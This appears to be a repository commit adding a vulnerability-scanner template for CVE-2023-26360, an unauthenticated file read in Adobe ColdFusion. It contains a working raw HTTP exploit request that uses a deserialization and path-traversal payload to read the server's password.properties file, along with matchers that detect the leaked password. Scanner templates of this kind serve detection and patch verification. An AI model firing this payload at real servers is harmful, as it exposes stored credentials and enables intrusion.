Create CVE-2023-26360.yaml
parent
295e2923d6
commit
cb9fce3f99
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2023-26360
|
||||
|
||||
info:
|
||||
name: Unauthenticated File Read Adobe ColdFusion
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
|
||||
reference:
|
||||
- https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-26360
|
||||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cwe-id: CWE-284
|
||||
tags: cve,cve2023,adobe,coldfusion,lfi,kev
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "password="
|
||||
- "encrypted=true"
|
||||
- "adobe"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
Loading…
Reference in New Issue